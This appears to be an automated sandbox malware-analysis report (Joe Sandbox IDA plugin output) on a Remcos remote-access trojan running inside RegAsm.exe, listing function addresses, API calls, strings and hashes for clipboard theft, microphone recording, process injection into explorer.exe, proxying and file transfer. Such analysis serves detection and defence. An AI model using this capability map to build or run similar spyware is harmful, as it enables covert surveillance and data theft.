Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: 0VG$0VG$<$@$Temp
API String ID: 1704390241-2575729100
Opcode ID: 62621946d8eb1aa2ce2b39a4af5520ae479f7c91f66b5ded83c662c0635c4b6b
Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
Opcode Fuzzy Hash: 62621946d8eb1aa2ce2b39a4af5520ae479f7c91f66b5ded83c662c0635c4b6b
Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99

Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00416941
EmptyClipboard.USER32 ref: 0041694F
CloseClipboard.USER32 ref: 00416955
OpenClipboard.USER32 ref: 0041695C
GetClipboardData.USER32 ref: 0041696C
GlobalLock.KERNEL32 ref: 00416975
GlobalUnlock.KERNEL32(00000000), ref: 0041697E
CloseClipboard.USER32 ref: 00416984

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID: !D@
API String ID: 2172192267-604454484
Opcode ID: 379e7e26ad6a900c3167f358ae85a18f925cef018a940f3467d8a5dc77bbddf2
Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
Opcode Fuzzy Hash: 379e7e26ad6a900c3167f358ae85a18f925cef018a940f3467d8a5dc77bbddf2
Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69

Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA

Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 100059EA

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 100059F6
_free.LIBCMT ref: 10005A01
_free.LIBCMT ref: 10005A0C
_free.LIBCMT ref: 10005A17
_free.LIBCMT ref: 10005A22
_free.LIBCMT ref: 10005A2D
_free.LIBCMT ref: 10005A38
_free.LIBCMT ref: 10005A43
_free.LIBCMT ref: 10005A51

Memory Dump Source

Source File: 00000010.00000002.958379212.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.958369053.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.958379212.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_RegAsm.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84

Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00448135

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00448141
_free.LIBCMT ref: 0044814C
_free.LIBCMT ref: 00448157
_free.LIBCMT ref: 00448162
_free.LIBCMT ref: 0044816D
_free.LIBCMT ref: 00448178
_free.LIBCMT ref: 00448183
_free.LIBCMT ref: 0044818E
_free.LIBCMT ref: 0044819C

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5

Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00411514
inet_ntoa.WS2_32(E3FBFDC0), ref: 004115AF

Strings

StopForward, xrefs: 00411690
StartForward, xrefs: 00411673
GetDirectListeningPort, xrefs: 004116B2
StartReverse, xrefs: 0041167F
StopReverse, xrefs: 004116A1
NG, xrefs: 0041153A

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
API String ID: 3578746661-3604713145
Opcode ID: be6cb079195f4bc1f2092aa857b2f6d123677db1dd367345ba172c1e3a3d1157
Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
Opcode Fuzzy Hash: be6cb079195f4bc1f2092aa857b2f6d123677db1dd367345ba172c1e3a3d1157
Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE

Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27

Strings

log, xrefs: 00455FCD, 00455FD9
exp, xrefs: 00455FEC, 0045604E
sqrt, xrefs: 004560AB
acos, xrefs: 0045609F
asin, xrefs: 00456093
log10, xrefs: 00455F71, 00455FC1
pow, xrefs: 0045600B, 004560B7, 004560CA

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E

Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E

Sleep.KERNEL32(00000064), ref: 00417521
DeleteFileW.KERNEL32(00000000), ref: 00417555

Strings

\sysinfo.txt, xrefs: 004174A0
open, xrefs: 004174EF
/t , xrefs: 004174D4
temp, xrefs: 004174A5
dxdiag, xrefs: 004174EA

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: f8410daf8611d6dd58e1b86e5ccb1e64fac469e803ba3f11ccb0ef9c9bbe0734
Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
Opcode Fuzzy Hash: f8410daf8611d6dd58e1b86e5ccb1e64fac469e803ba3f11ccb0ef9c9bbe0734
Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C

Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E

Strings

\explorer.exe, xrefs: 00407400
explorer.exe, xrefs: 00407450, 0040747B
PEB: %x, xrefs: 004074AF
[-] NtAllocateVirtualMemory Error, xrefs: 0040743D
[+] NtAllocateVirtualMemory Success, xrefs: 00407410
windir, xrefs: 004073EA

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
API String ID: 2050909247-4242073005
Opcode ID: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
Opcode Fuzzy Hash: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F

Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401D50

Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9

waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F

Strings

%Y-%m-%d %H.%M, xrefs: 00401D41
.wav, xrefs: 00401D69
|MG, xrefs: 00401E08
dMG, xrefs: 00401D81

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
API String ID: 3809562944-243156785
Opcode ID: ad8ba90a2921d66a3c12ccf8c1a2d8e4c0e0e91c69b7ff21a65ebece821e0ee7
Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
Opcode Fuzzy Hash: ad8ba90a2921d66a3c12ccf8c1a2d8e4c0e0e91c69b7ff21a65ebece821e0ee7
Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E

Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
int.LIBCPMT ref: 00410E81

Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC

std::_Facet_Register.LIBCPMT ref: 00410EC1
std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
__CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
__Init_thread_footer.LIBCMT ref: 00410F29

Strings

0kG, xrefs: 00410F31
,kG, xrefs: 00410F04

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID: ,kG$0kG
API String ID: 3815856325-2015055088
Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D

Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
waveInStart.WINMM ref: 00401CFE

Strings

|MG, xrefs: 00401C9B
dMG, xrefs: 00401BED
8.v, xrefs: 00401C27

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID: 8.v$dMG$|MG
API String ID: 1356121797-2936489758
Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C

Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476

Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
TranslateMessage.USER32(?), ref: 0041D4E9
DispatchMessageA.USER32 ref: 0041D4F3
GetMessageA.USER32 ref: 0041D500

Strings

Remcos, xrefs: 0041D4B8

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98

Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69

Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

_memcmp.LIBVCRUNTIME ref: 00445423
_free.LIBCMT ref: 00445494
_free.LIBCMT ref: 004454AD
_free.LIBCMT ref: 004454DF
_free.LIBCMT ref: 004454E8
_free.LIBCMT ref: 004454F4

Strings

C, xrefs: 004452E1

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44

Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

tcp, xrefs: 00414A73
udp, xrefs: 00414A46

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A

Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004018BE
ExitThread.KERNEL32 ref: 004018F6
waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

Strings

PkG, xrefs: 00401888
u, xrefs: 00401902
NG, xrefs: 00401990
NG, xrefs: 0040190D

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: PkG$NG$NG$u
API String ID: 1649129571-1695625102
Opcode ID: 32caf72baa344b93b7639b7f3cc7fb3e2103f91f1378954705edd0ce90977c61
Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
Opcode Fuzzy Hash: 32caf72baa344b93b7639b7f3cc7fb3e2103f91f1378954705edd0ce90977c61
Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E

Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

CloseHandle.KERNEL32(00000000), ref: 00407A4D
MoveFileW.KERNEL32 ref: 00407A6A
CloseHandle.KERNEL32(00000000), ref: 00407A95
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5

Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3

Strings

.part, xrefs: 00407989

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID: .part
API String ID: 1303771098-3499674018
Opcode ID: d230553aec7110adf4e51ba4941b1d94ecbe35f1f5eea66a9c4207c894b51e14
Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
Opcode Fuzzy Hash: d230553aec7110adf4e51ba4941b1d94ecbe35f1f5eea66a9c4207c894b51e14
Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A

Function 0041B68A Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32 ref: 0041363D
Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF

_wcslen.LIBCMT ref: 0041B763

Strings

.exe, xrefs: 0041B6B5
http\shell\open\command, xrefs: 0041B69A
8SG, xrefs: 0041B709, 0041B70E
8.v, xrefs: 0041B696
program files (x86)\, xrefs: 0041B75D
program files\, xrefs: 0041B749, 0041B750, 0041B762

Memory Dump Source

Source File: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.957036685.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.957036685.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd

